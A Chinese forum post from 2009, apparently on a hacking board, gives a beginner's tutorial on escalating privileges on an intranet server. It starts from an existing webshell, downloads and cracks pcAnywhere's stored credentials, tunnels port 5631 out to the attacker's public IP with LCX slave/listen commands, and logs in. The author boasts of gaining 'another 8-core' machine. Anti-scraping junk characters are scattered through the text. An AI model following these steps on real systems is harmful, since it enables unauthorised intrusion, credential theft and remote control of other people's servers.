|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。
/ l! J+ G N5 e! B! F |! {
: M( R0 d1 ?, \! ?2 u( Q8 P提权方法:pcanywhere+LCX2 r6 P: R4 j8 `1 U( n
* \2 T. y% M& j* h7 Q获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。2 A8 r9 L7 z$ U6 l4 W& B+ K
3 B0 g8 L/ i2 I# [: `0 ^& D在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。, C$ k4 O7 ], ^3 H- |( p3 Y
- U. Y$ {4 _; g2 v: r$ \, A3 ~% i( w/ ]2 _ }7 c( {
查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。
5 e# s* a$ ] v! u) h
/ V2 w" [. x5 p- D) z# e
; v! k4 ^7 J3 A0 j! s, C L7 v呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。
; [- M, w) P+ u) B& E% h+ @
' Q' s5 A: |' {, j/ d8 d8 y4 e5 e& b2 s+ A
7 L, Y" n9 @; N1 d
- T! g/ e8 `7 |: K( M; P由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``" r- y/ w- ]0 o9 H" h$ e5 f
6 B' \% a* p0 s, n5 r( U0 ]& B$ D2 k2 ]' s N2 k
LCX的用法再简单说下:2 f) L1 U% o' m: ~% x6 p
. v% \$ f2 N: F1 Y2 i
服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)
G" ]" h, d0 G+ P, A3 I) C" Q+ M, f! F" `1 Z9 S9 V3 s
本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)" [" G' e# @7 V& u$ I+ Q
+ I) l4 O( H* u5 M9 T5 w9 x由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。3 J' m3 I4 r" o' t1 `
顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``
9 q1 F& O0 H9 n# \% t! a3 s" n, z- W; b$ v1 i! n8 e! [
! W$ }( T9 s8 j- Z- Q2 i8 ^% Q
5 `1 N" G! g: y# G! O
. ]0 s% Q" Q& C0 O: |0 {呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。
/ m. c/ C5 M0 O% A7 g+ ]( w8 W
/ Z9 ^3 V; l, @2 i, ]: o0 p7 S. `! E2 P7 \) y* ]
' k8 }2 I: J' w7 b6 M. k
/ I& m, @4 {! B3 L/ L: f& F
我们本地连接试试,输入我们刚破解的账号密码; Y* _# n- D% B+ Y$ Q; c
# c7 W* d! K: J
) u1 X Y0 O. E g
呵呵``连接成功,服务器不错,又一个8核^︵^
' i; P; P9 R- m1 b! {
$ v" |/ L( a J. Z; ?: {8 I* g* U a8 M$ j2 l7 \
: Y% c6 g" s( B# h m0 Y
|
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-7-5 21:37
| .gif)
